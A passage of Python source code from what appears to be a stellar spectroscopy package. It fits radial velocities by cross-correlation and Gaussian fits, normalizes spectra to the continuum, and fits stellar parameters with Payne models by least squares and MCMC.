dln.limit(best_xshift-dln.gt(estimates2[2],1), np.min(lag), estimates2[1]-1), 0.3*estimates2[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates2[3]-0.1)) ] ubounds2 = [1.5*estimates2[0], dln.limit(best_xshift+dln.gt(estimates2[2],1), estimates2[1]+1, np.max(lag)), 1.5*estimates2[2], dln.gt(np.max(ccf_diff)*0.5,estimates2[3]+0.1) ] lo2 = np.int(dln.gt(np.floor( best_shiftind-dln.gt(estimates2[2]*2,5)),0)) hi2 = np.int(dln.lt(np.ceil( best_shiftind+dln.gt(estimates2[2]*2,5)),len(lag))) pars2, cov2 = dln.gaussfit(lag[lo2:hi2],ccf_diff[lo2:hi2],estimates2,ccferr[lo2:hi2],bounds=(lbounds2,ubounds2)) yfit2 = dln.gaussian(lag[lo2:hi2],*pars2) perror2 = np.sqrt(np.diag(cov2)) # Refit with even narrower range estimates3 = pars2 estimates3[1] = dln.limit(estimates3[1],np.min(lag),np.max(lag)) # must be in range estimates3[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3] lbounds3 = [0.5*estimates3[0], dln.limit(best_xshift-dln.gt(estimates3[2],1), np.min(lag), estimates3[1]-1), 0.3*estimates3[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ] ubounds3 = [1.5*estimates3[0], dln.limit(best_xshift+dln.gt(estimates3[2],1), estimates3[1]+1, np.max(lag)), 1.5*estimates3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ] lo3 = np.int(dln.gt(np.floor(best_shiftind-dln.gt(estimates3[2]*2,5)),0)) hi3 = np.int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates3[2]*2,5)),len(lag))) pars3, cov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],estimates3,ccferr[lo3:hi3],bounds=(lbounds3,ubounds3)) yfit3 = dln.gaussian(lag[lo3:hi3],*pars3) perror3 = np.sqrt(np.diag(cov3)) # This seems to fix high shift/sigma errors if (perror3[0]>10) | (perror3[1]>10): dlbounds3 = [0.5*estimates3[0], -10+pars3[1], 0.01, dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ] dubounds3 = [1.5*estimates3[0], 10+pars3[1], 2*pars3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ] dpars3, dcov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],pars3,ccferr[lo3:hi3],bounds=(dlbounds3,dubounds3)) dyfit3 = dln.gaussian(lag[lo3:hi3],*pars3) perror3 = np.sqrt(np.diag(dcov3)) # Final parameters pars = pars3 perror = perror3 xshift = pars[1] xshifterr = perror[1] ccpfwhm_pix = pars[2]*2.35482 # ccp fwhm in pixels # v = (10^(delta log(wave))-1)*c dwlog = np.median(dln.slope(np.log10(wave))) ccpfwhm = ( 10**(ccpfwhm_pix*dwlog)-1 )*cspeed # in km/s # Convert pixel shift to velocity #--------------------------------- # delta log(wave) = log(v/c+1) # v = (10^(delta log(wave))-1)*c dwlog = np.median(dln.slope(np.log10(wave))) vrel = ( 10**(xshift*dwlog)-1 )*cspeed # Vrel uncertainty dvreldshift = np.log(10.0)*(10**(xshift*dwlog))*dwlog*cspeed # derivative wrt shift vrelerr = dvreldshift * xshifterr # Make CCF structure and add to STR #------------------------------------ outstr["xshift0"] = best_xshift outstr["ccp0"] = np.max(ccf) outstr["xshift"] = xshift outstr["xshifterr"] = xshifterr #outstr[i].xshift_interp = xshift_interp outstr["ccpeak"] = pars[0] outstr["ccpfwhm"] = ccpfwhm # in km/s outstr["ccp_pars"] = pars outstr["ccp_perror"] = perror #outstr[i].ccp_polycoef = polycoef outstr["vrel"] = vrel outstr["vrelerr"] = vrelerr outstr["w0"] = np.min(wave) outstr["dw"] = dwlog return outstr def normspec(spec=None,ncorder=6,fixbadpix=True,noerrcorr=False, binsize=0.05,perclevel=95.0,growsky=False,nsky=5): """ This program normalizes a spectrum. Parameters ---------- spec : Spec1D object A spectrum object. This at least needs to have a FLUX and WAVE attribute. ncorder : int, default=6 The continuum polynomial order. The default is 6. noerrcorr : bool, default=False Do not use a correction for the effects of the errors on the continuum measurement. The default is to make this correction if errors are included. fixbadpix : bool, default=True Set bad pixels to the continuum binsize : float, default=0.05 The binsize to use (in units of 900A) for determining the Nth percentile spectrum to fit with a polynomial. perclevel : float, default=95 The Nth percentile to use to determine the continuum. Returns ------- nspec : array The continuum normalized spectrum. cont : array The continuum array. masked : array A boolean array specifying if a pixel was masked (True) or not (False). Examples -------- .. code-block:: python nspec,cont,masked = normspec(spec) """ # Not enough inputs if spec is None: raise ValueError("""spec2 = normspec(spec,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr, binsize=binsize,perclevel=perclevel)""") musthave = ['flux','err','mask','wave'] for a in musthave: if hasattr(spec,a) is False: raise ValueError("spec object must have "+a) # Can only do 1D or 2D arrays if spec.flux.ndim>2: raise Exception("Flux can only be 1D or 2D arrays") # Do special processing if the input is 2D # Loop over the shorter axis if spec.flux.ndim==2: nx, ny = spec.flux.shape nspec = np.zeros(spec.flux.shape) cont = np.zeros(spec.flux.shape) masked = np.zeros(spec.flux.shape,bool) if nx<ny: for i in range(nx): flux = spec.flux[i,:] err = spec.err[i,:] mask = spec.mask[i,:] wave = spec.wave[i,:] spec1 = Spec1D(flux) spec1.err = err spec1.mask = mask spec1.wave = wave nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr, binsize=binsize,perclevel=perclevel) nspec[i,:] = nspec1 cont[i,:] = cont1 masked[i,:] = masked1 else: for i in range(ny): flux = spec.flux[:,i] err = spec.err[:,i] mask = spec.mask[:,i] wave = spec.wave[:,i] spec1 = Spec1D(flux) spec1.err = err spec1.mask = mask spec1.wave = wave nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr, binsize=binsize,perclevel=perclevel) nspec[:,i] = nspec1 cont[:,i] = cont1 masked[:,i] = masked1 return (nspec,cont,masked) # Continuum Normalize #---------------------- w = spec.wave.copy() x = (w-np.median(w))/(np.max(w*0.5)-np.min(w*0.5)) # -1 to +1 y = spec.flux.copy() yerr = None if hasattr(spec,'err') is True: if spec.err is not None: yerr = spec.err.copy() # Get good pixels, and set bad pixels to NAN #-------------------------------------------- gdmask = (y>0) # need positive fluxes ytemp = y.copy() # Exclude pixels with mask=bad if hasattr(spec,'mask') is True: if spec.mask is not None: mask = spec.mask.copy() gdmask = (mask == 0) gdpix = (gdmask == 1) ngdpix = np.sum(gdpix) bdpix = (gdmask != 1) nbdpix = np.sum(bdpix) if nbdpix>0: ytemp[bdpix]=np.nan # set bad pixels to NAN for now # First attempt at continuum #---------------------------- # Bin the data points xr = [np.nanmin(x),np.nanmax(x)] bins = np.ceil((xr[1]-xr[0])/binsize)+1 ybin, bin_edges, binnumber = bindata.binned_statistic(x,ytemp,statistic='percentile', percentile=perclevel,bins=bins,range=None) xbin = bin_edges[0:-1]+0.5*binsize gdbin = np.isfinite(ybin) ngdbin = np.sum(gdbin) if ngdbin<(ncorder+1): raise Exception("Not enough good flux points to fit the continuum") # Fit with robust polynomial coef1 = dln.poly_fit(xbin[gdbin],ybin[gdbin],ncorder,robust=True) cont1 = dln.poly(x,coef1) # Subtract smoothed error from it to remove the effects # of noise on the continuum measurement if (yerr is not None) & (noerrcorr is False): smyerr = dln.medfilt(yerr,151) # first median filter smyerr = dln.gsmooth(smyerr,100) # Gaussian smoothing coef_err = dln.poly_fit(x,smyerr,ncorder,robust=True) # fit with robust poly #poly_err = dln.poly(x,coef_err) #cont1 -= 2*dln.poly_err # is this right???? med_yerr = np.median(smyerr) # median error cont1 -= 2*med_yerr # Second iteration #----------------- # This helps remove some residual structure ytemp2 = ytemp/cont1 ybin2, bin_edges2, binnumber2 = bindata.binned_statistic(x,ytemp2,statistic='percentile', percentile=perclevel,bins=bins,range=None) xbin2 = bin_edges2[0:-1]+0.5*binsize gdbin2 = np.isfinite(ybin2) ngdbin2 = np.sum(gdbin2) if ngdbin2<(ncorder+1): raise Exception("Not enough good flux points to fit the continuum") # Fit with robust polynomial coef2 = dln.poly_fit(xbin2[gdbin2],ybin2[gdbin2],ncorder,robust=True) cont2 = dln.poly(x,coef2) # Subtract smoothed error again if (yerr is not None) & (noerrcorr is False): cont2 -= med_yerr/cont1 # Final continuum cont = cont1*cont2 # final continuum # "Fix" bad pixels if (nbdpix>0) & fixbadpix is True: y[bdpix] = cont[bdpix] # Create continuum normalized spectrum nspec = spec.flux.copy()/cont # Add "masked" array masked = np.zeros(spec.flux.shape,bool) if (fixbadpix is True) & (nbdpix>0): masked[bdpix] = True return (nspec,cont,masked) def spec_resid(pars,wave,flux,err,models,spec): """ This helper function calculates the residuals between an observed spectrum and a Cannon model spectrum. Parameters ---------- pars : array Input parameters [teff, logg, feh, rv]. wave : array Wavelength array for observed spectrum. flux : array Observed flux array. err : array Uncertainties in the observed flux. models : list of Cannon models List of Cannon models to use spec : Spec1D The observed spectrum. Needed to run cannon.model_spectrum(). Returns ------- resid : array Array of residuals between the observed flux array and the Cannon model spectrum. Example ------- .. code-block:: python resid = spec_resid(pars,wave,flux,err,models,spec) """ #m = cannon.model_spectrum(models,spec,teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3]) m = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3]) if m is None: return np.repeat(1e30,len(flux)) resid = (flux-m.flux.flatten())/err return resid def printpars(pars,parerr=None,names=None,units=None): """ Print out the parameters/labels with optionally uncertainties and units. One parameter per line of output. Parameters ---------- pars : list or numpy array List or array of parameter values to print out. The default is TEFF, LOGG, FE_H and VREL. parerr : list or numpy array, optional List or array of parameter uncertainties to print out. No uncertainties are printed by default. names : list, optional List of parameter names. The default is ['Teff','logg','[Fe/H]','Vrel'] if 4 parameters are input or ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel'] if 5 parameteres are input. units : list, optional List of parameter units. Returns ------- Parameter values are printed to the screen, one parameter per line. Example ------- .. code-block:: python printpars(pars,parerr,names,names) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging npars = len(pars) if names is None: if npars==3: names = ['Teff','logg','[Fe/H]'] units = ['K','',''] if npars==4: names = ['Teff','logg','[Fe/H]','Vrel'] units = ['K','','','km/s'] if npars==5: names = ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel'] units = ['K','','','','km/s'] if units is None: units = [' ' for l in pars] for i in range(npars): if parerr is None: err = None else: err = parerr[i] if err is not None: print('%-6s = %8.2f +/- %6.3f %-5s' % (names[i],pars[i],err,units[i])) else: print('%-6s = %8.2f %-5s' % (names[i],pars[i],units[i])) ######################### PAYNE PROGRAMS ########################### def emcee_lnlike_payne(theta, x, y, yerr, sp): """ This helper function calculates the log likelihood for fit_mcmc_payne(). Parameters ---------- theta : array Input parameters [teff, logg, feh, rv]. x : array Array of x-values for y. Not really used. y : array Observed flux array. yerr : array Uncertainties in the observed flux. sp : PayneSpecFitter Special class for fitting Payne models to data. Returns ------- lnlike : float The log likelihood value. """ mflux = sp.model(x,*theta) inv_sigma2 = 1.0/yerr**2 return -0.5*(np.sum((y-mflux)**2*inv_sigma2)) def emcee_lnprior_payne(theta, sp): """ This helper function calculates the log prior for fit_mcmc_payne(). It's a flat/uniform prior across the stellar parameter space covered by the Payne model. Parameters ---------- theta : array Input parameters [teff, logg, feh, rv, etc.]. sp : PayneSpecFitter Special class for fitting Payne models to data. Returns ------- lnprior : float The log prior value. """ lbounds,ubounds = sp.bounds nfitparams = len(sp.fitparams) inside = True for i in range(nfitparams): inside &= (theta[i]>=lbounds[i]) & (theta[i]<=ubounds[i]) if inside: return 0.0 return -np.inf def emcee_lnprob_payne(theta, x, y, yerr, sp): """ This helper function calculates the log probability for fit_mcmc_payne(). Parameters ---------- theta : array Input parameters [teff, logg, feh, rv, etc.]. x : array Array of x-values for y. Not really used. y : array Observed flux array. yerr : array Uncertainties in the observed flux. sp : PayneSpecFitter Special class for fitting Payne models to data. Returns ------- lnprob : float The log probability value, which is the sum of the log prior and the log likelihood. """ lp = emcee_lnprior_payne(theta,sp) if not np.isfinite(lp): return -np.inf return lp + emcee_lnlike_payne(theta, x, y, yerr, sp) def fit_xcorrgrid_payne(spec,model=None,samples=None,verbose=False,maxvel=1000.0): """ Fit spectrum using cross-correlation with models sampled in the parameter space. Parameters ---------- spec : Spec1D object The observed spectrum to match. model : Payne model, optional Payne model to use. The default is to load all of the Payne models in the data/ directory and use those. samples : numpy structured array, optional Catalog of teff/logg/feh/alphafe parameters to use when sampling the parameter space. verbose : bool, optional Verbose output of the various steps. This is False by default. maxvel : float, optional The maximum velocity to probe in the cross-correlation. The default is 1000 km/s. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Payne model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_xcorrgrid_payne(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Check that the samples input has the right columns if samples is not None: for n in ['teff','logg','fe_h','alpha_h']: try: dum = samples[n] except: raise ValueError(n+' not found in input SAMPLES') # Step 1: Prepare the spectrum #----------------------------- # normalize and mask spectrum if spec.normalized is False: spec = utils.specprep(spec) # Step 2: Load and prepare the Cannon models #------------------------------------------- if model is None: model = payne.load_models() # Prepare if necessary if model.prepared is False: model.prepare(spec) # Step 3: put on logarithmic wavelength grid #------------------------------------------- wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution obs = spec.interp(wavelog) # The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation # it's okay because the "model" is prepared for the original spectra (above) # Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space #------------------------------------------------------------------------------------------------ dwlog = np.median(dln.slope(np.log10(wavelog))) # vrel = ( 10**(xshift*dwlog)-1 )*cspeed maxlag = np.int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog)) maxlag = np.maximum(maxlag,50) if samples is None: teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0] logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0] feh = [-1.5, -0.5, -1.5, -0.5] alphafe = [0.0, 0.0, 0.3, 0.3] dt = np.dtype([('teff',float),('logg',float),('feh',float),('alphafe',float)]) samples = np.zeros(len(teff)*len(feh),dtype=dt) nteff = len(teff) for i in range(len(feh)): samples['teff'][i*nteff:(i+1)*nteff] = teff samples['logg'][i*nteff:(i+1)*nteff] = logg samples['feh'][i*nteff:(i+1)*nteff] = feh[i] samples['alphafe'][i*nteff:(i+1)*nteff] = alphafe[i] outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32), ('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32),('alphafe',np.float32)]) outstr = np.zeros(len(samples),dtype=outdtype) if verbose is True: print(' TEFF LOGG FEH ALPHAFE VREL CCPEAK CHISQ') for i in range(len(samples)): inpdict = {'teff':samples['teff'][i],'logg':samples['logg'][i],'fe_h':samples['feh'][i], 'alpha_h':samples['alphafe'][i]+samples['feh'][i],'rv':0.0} labels = model.mklabels(inpdict) m = model(labels,wave=wavelog) outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag) #if outstr1['chisq'] > 1000: # import pdb; pdb.set_trace() if verbose is True: print('%7.0f %5.2f %5.2f %5.2f %8.2f %5.2f %5.2f' % (samples['teff'][i],samples['logg'][i],samples['feh'][i], samples['alphafe'][i],outstr1['vrel'][0],outstr1['ccpeak'][0], outstr1['chisq'][0])) for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n] outstr['teff'][i] = samples['teff'][i] outstr['logg'][i] = samples['logg'][i] outstr['feh'][i] = samples['feh'][i] outstr['alphafe'][i] = samples['alphafe'][i] #import pdb; pdb.set_trace() # Get best fit bestind = np.argmin(outstr['chisq']) beststr = outstr[bestind] bestlabels = model.mklabels({'teff':beststr['teff'],'logg':beststr['logg'],'fe_h':beststr['feh'], 'alpha_h':beststr['alphafe']+beststr['feh'],'rv':beststr['vrel']}) bestmodel = model(bestlabels) if verbose is True: print('Initial RV fit:') printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['alphafe'],beststr['vrel']], [None,None,None,None,beststr['vrelerr']]) print('chisq = %5.2f' % beststr['chisq']) return beststr, bestmodel def make_payne_initlabels(labels): """ Make initial guesses for Payne labels.""" labels = np.char.array(labels).upper() # Initializing the labels array nlabels = len(labels) initpars = np.zeros(nlabels,float) initpars[labels=='TEFF'] = 5000.0 initpars[labels=='LOGG'] = 3.5 initpars[labels.endswith('_H')] = 0.0 # Vmicro/Vturb=2.0 km/s by default initpars[(labels=='VTURB') | (labels=='VMICRO')] = 2.0 # All abundances, VSINI, VMACRO, RV = 0.0 return initpars def make_payne_bounds(labels,initpars=None): """ Make upper and lower bounds for Payne labels.""" if initpars is None: initpars = make_payne_initlabels(labels) nlabels = len(labels) lbounds = np.zeros(nlabels,np.float64) ubounds = np.zeros(nlabels,np.float64) # Initial guesses and bounds for the fitted parameters for i,par in enumerate(labels): if par.upper()=='TEFF': lbounds[i] = np.maximum(initpars[i]-2000,3000) ubounds[i] = initpars[i]+2000 if par.upper()=='LOGG': lbounds[i] = np.maximum(initpars[i]-2,0) ubounds[i] = np.minimum(initpars[i]+2,5) if par.upper()=='VTURB': lbounds[i] = np.maximum(initpars[i]-2,0) ubounds[i] = initpars[i]+2 if par.upper().endswith('_H'): lbounds[i] = np.maximum(initpars[i]-0.75,-2.5) ubounds[i] = np.minimum(initpars[i]+0.75,0.5) if par.upper()=='FE_H': lbounds[i] = -2.5 ubounds[i] = 0.5 if par.upper()=='VSINI': lbounds[i] = np.maximum(initpars[i]-20,0) ubounds[i] = initpars[i]+50 if par.upper()=='VMACRO': lbounds[i] = np.maximum(initpars[i]-2,0) ubounds[i] = initpars[i]+2 if par.upper()=='RV': lbounds[i] = -1000.0 ubounds[i] = 1000.0 bounds = (lbounds,ubounds) return bounds def fit_lsq_payne(spec,model=None,initpar=None,fitparams=None,fixparams={},verbose=False): """ Least Squares fitting with forward modeling of the spectrum. Parameters ---------- spec : Spec1D object The observed spectrum to match. model : Payne model, optional Payne model to use. The default is to load all of the Payne models in the data/ directory and use those. initpar : dictionary or array, optional Initial estimates for parameters. If it is an array, then it is assumbed that these are for the FITPARAMS parameters. If it is a dictionary, then the parameters are clear and they do not need to cover all FITPARAMS parameters. Optional. fitparams : list of labels, optional List of Payne parameter/label names to fit. Optional. The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV']. fixparams : dict, optional Dictionary of parameters to hold fixed. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Payne model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_lsq_payne(spec,model) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Prepare the spectrum #----------------------------- # normalize and mask spectrum if spec.normalized is False: spec = utils.specprep(spec) # Load and prepare the Cannon models #------------------------------------------- if model is None: model = payne.load_models() # Prepare if necessary if model.prepared is False: model.prepare(spec) # Fitting parameters if fitparams is None: fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV'] else: fitparams = [f.upper() for f in fitparams] # all CAPS nfitparams = len(fitparams) nfixparams = len(fixparams) nallparams = nfitparams+nfixparams # Get initial estimates # this does not need to include initial guess for all fitparams # that's taken care of below if initpar is not None and isinstance(initpar,dict) is False: # Array input # must be the initial parameters for FITPARAMS if len(initpar)!=len(fitparams): raise Exception("INITPAR must have same number of elements as FITPARAMS") initpar = dict(zip(fitparams,initpar)) # make dictionary # Make initial parameters for all labels allinitpar = make_payne_initlabels(fitparams) if initpar is not None: for name in initpar.keys(): ind, = np.where(np.char.array(fitparams)==name) if len(ind)>0: allinitpar[ind[0]] = initpar[name] # Initialize spectral fitter sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False) # Calculate the bounds bounds = sp.mkbounds(fitparams,allinitpar) # Use curve_fit tol = 5e-5 # 5e-4 dx_lim = sp.mkdxlim(fitparams) lspars, lscov = curve_fit(sp.model,spec.wave.flatten(),spec.flux.flatten(), #dx_lim=dx_lim, sigma=spec.err.flatten(),p0=allinitpar,bounds=bounds,jac=sp.jac) #print(sp.nfev,sp.njac) # If it hits a boundary then the solution won't change much compared to initpar # setting absolute_sigma=True gives crazy low lsperror values lsperror = np.sqrt(np.diag(lscov)) if verbose is True: print('Least Squares RV and stellar parameters:') printpars(lspars,names=fitparams) if nfixparams>0: all_labels = fitparams+list(fixparams.keys()) all_pars = lspars + fixparams.values() else: all_labels = fitparams all_pars = lspars bestlabels = model.mklabels(dict(zip(all_labels,all_pars))) lsmodel = model(bestlabels) lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder)) if verbose is True: print('chisq = %5.2f' % lschisq) # Put it into the output structure dtype = np.dtype([('labels','<U100',nfitparams),('pars',float,nfitparams),('parerr',float,nfitparams), ('parcov',float,(nfitparams,nfitparams)),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['labels'] = fitparams out['pars'] = lspars out['parerr'] = lsperror out['parcov'] = lscov out['chisq'] = lschisq return out, lsmodel def mcmc_delta_payne(labels): """ Get MCMC deltas for the walkers.""" delta = np.zeros(len(labels),float) for i in range(len(labels)): name = labels[i] if name=='TEFF': step = 50.0 elif name=='RV': step = 5 elif name=='VROT': step = 5 elif name=='VMICRO': step = 1.0 elif name.endswith('_H'): step = 0.1 else: step = 0.1 delta[i] = step return delta def fit_mcmc_payne(spec,model=None,fitparams=None,fixparams={},initpar=None,steps=100, cornername=None,verbose=False): """ Fit the spectrum with MCMC. Parameters ---------- spec : Spec1D object The observed spectrum to match. model: Payne model, optional Payne model to use. The default is to load the Payne model in the data/ directory and use those. fitparams : list of labels, optional List of Payne parameter/label names to fit. Optional. The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV']. fixparams : dict, optional Dictionary of parameters to hold fixed. initpar : numpy array, optional Initial estimate for [teff, logg, feh, RV], optional. steps : int, optional Number of steps to use. Default is 100. cornername : string, optional Output filename for the corner plot. If a corner plot is requested, then the minimum number of steps used is 500. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_mcmc_payne(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Prepare the spectrum #----------------------------- # normalize and mask spectrum if spec.normalized is False: spec = utils.specprep(spec) # Fitting parameters if fitparams is None: fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV'] nfitparams = len(fitparams) nfixparams = len(fixparams) # Load the Payne model #----------------------- if model is None: model = payne.load_models() model.prepare(spec) # Initial estimates if initpar is None: initpar = make_payne_initlabels(fitparams) # Initialize spectral fitter sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False) # Calculate the bounds bounds = sp.mkbounds(fitparams,initpar) sp.bounds = bounds # Set up the MCMC sampler ndim, nwalkers = nfitparams, 20 delta = mcmc_delta_payne(fitparams) pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)] sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_payne, args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), sp)) if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps # Run MCMC sampler if verbose: print('Running MCMC') out = sampler.run_mcmc(pos, steps) samples = sampler.chain[:, np.int(steps/2):, :].reshape((-1, ndim)) # Get the median and stddev values pars = np.zeros(ndim,float) parerr = np.zeros(ndim,float) if verbose is True: print('MCMC values:') for i in range(ndim): t=np.percentile(samples[:,i],[16,50,84]) pars[i] = t[1] parerr[i] = (t[2]-t[0])*0.5 if verbose is True: printpars(pars,parerr,names=fitparams) # The maximum likelihood parameters bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape) pars_ml = sampler.chain[bestind[0],bestind[1],:] # Get best model if nfixparams>0: all_labels = fitparams+list(fixparams.keys()) all_pars = pars + fixparams.values() else: all_labels = fitparams all_pars = pars bestlabels = model.mklabels(dict(zip(all_labels,all_pars))) mcmodel = model(bestlabels) mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder)) # Put it into the output structure dtype = np.dtype([('pars',float,ndim),('pars_ml',float,ndim),('parerr',float,ndim),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['pars'] = pars out['pars_ml'] = pars_ml out['parerr'] = parerr out['chisq'] = mcchisq # Corner plot if cornername is not None: matplotlib.use('Agg') fig = corner.corner(samples, labels=fitparams, truths=pars) plt.savefig(cornername) plt.close(fig) print('Corner plot saved to '+cornername) return out,mcmodel def fit_payne(spectrum,model=None,fitparams=None,fixparams={},verbose=False, figfile=None,mcmc=False,cornername=None,nthreads=None, notweak=False,tpoly=False,tpolyorder=3): """ Fit the spectrum. Find the best RV and stellar parameters using the Payne model. Parameters ---------- spectrum : Spec1D object The observed spectrum to match. model: Payne model, optional Payne model to use. The default is to load the Payne model in the data/ directory and use those. fitparams : list of labels, optional List of Payne parameter/label names to fit. Optional. The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV']. fixparams : dict, optional Dictionary of parameters to hold fixed. verbose : bool, optional Verbose output of the various steps. This is False by default. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is False by default. figfile : string, optional The filename for a diagnostic plot showing the observed spectrum, model spectrum and the best-fit parameters. cornername : string, optional The filename for a "corner" plot showing the posterior distributions from the MCMC run. nthreads : int, optional The number of threads to use. By default the number of threads is not limited. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. model : Spec1D object The best-fitting Payne model spectrum (as Spec1D object). specm : Spec1D object The observed spectrum with discrepant and outlier pixels masked. Example ------- .. code-block:: python out, model = fit_payne(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Set threads if nthreads is not None: os.environ["OMP_NUM_THREADS"] = str(nthreads) os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads) os.environ["MKL_NUM_THREADS"] = str(nthreads) os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads) os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads) t0 = time.time() # Make internal copy spec = spectrum.copy() # Fitting parameters if fitparams is None: fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV'] else: fitparams = [f.upper() for f in fitparams] if verbose: print('Fitting Payne model to spectrum with parameters: '+', '.join(fitparams)) nfitparams = len(fitparams) nfixparams = len(fixparams) # Step 1: Prepare the spectrum #----------------------------- # Normalize and mask the spectrum spec = utils.specprep(spec) # Mask out any large positive outliers, e.g. badly subtracted sky lines specm = utils.maskoutliers(spec,verbose=verbose) # Step 2: Load the Payne model #------------------------------ if model is None: model = payne.load_models() model.prepare(specm) # Check the input labels against the Paybe model labels fitparams = payne.check_params(model,fitparams) if nfixparams>0: fixparams = payne.check_params(model,fixparams) # Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space #------------------------------------------------------------------------------------------------ beststr, xmodel = fit_xcorrgrid_payne(specm,model,verbose=verbose,maxvel=1000.0) # Step 4: Least Squares fitting with forward modeling #---------------------------------------------------- # Tweak the continuum #specm = tweakcontinuum(specm,xmodel) # Initial estimates initpar = {'TEFF':beststr['teff'],'LOGG':beststr['logg'],'FE_H':beststr['feh'], 'ALPHA_H':beststr['alphafe']+beststr['feh'],'RV':beststr['vrel']} lsout0, lsmodel0 = fit_lsq_payne(specm,model,initpar=initpar,fitparams=fitparams, fixparams=fixparams,verbose=verbose) lspars0 = lsout0['pars'][0] lsperror0 = lsout0['parerr'][0] # Tweak the continuum normalization if notweak is False: specm = tweakcontinuum(specm,lsmodel0,usepoly=tpoly,polyorder=tpolyorder) # Mask out very discrepant pixels when compared to the best-fit model specm = utils.maskdiscrepant(specm,lsmodel0,verbose=verbose) # Refit with Payne lsout, lsmodel = fit_lsq_payne(specm,model,initpar=dict(zip(fitparams,lspars0)), fitparams=fitparams,fixparams=fixparams,verbose=verbose) lspars = lsout['pars'][0] lsperror = lsout['parerr'][0] else: lsout = lsout0 lsmodel = lsmodel0 lspars = lspars0 lsperror = lsperror0 # Step 5: Run fine grid in RV, forward modeling #---------------------------------------------- maxv = 10.0 rvind, = np.where(np.char.array(fitparams)=='RV')[0] vel = dln.scale_vector(np.arange(31),lspars[rvind]-maxv,lspars[rvind]+maxv) chisq = np.zeros(len(vel)) tinput = dict(zip(fitparams,lsout['pars'][0].copy())) if nfixparams>0: # add fixed parameters tinput.update(fixparams) for i,v in enumerate(vel): tinput['RV'] = v tlabels = model.mklabels(tinput) m = model(tlabels) chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder)) vel2 = dln.scale_vector(np.arange(300),lspars[rvind]-maxv,lspars[rvind]+maxv) 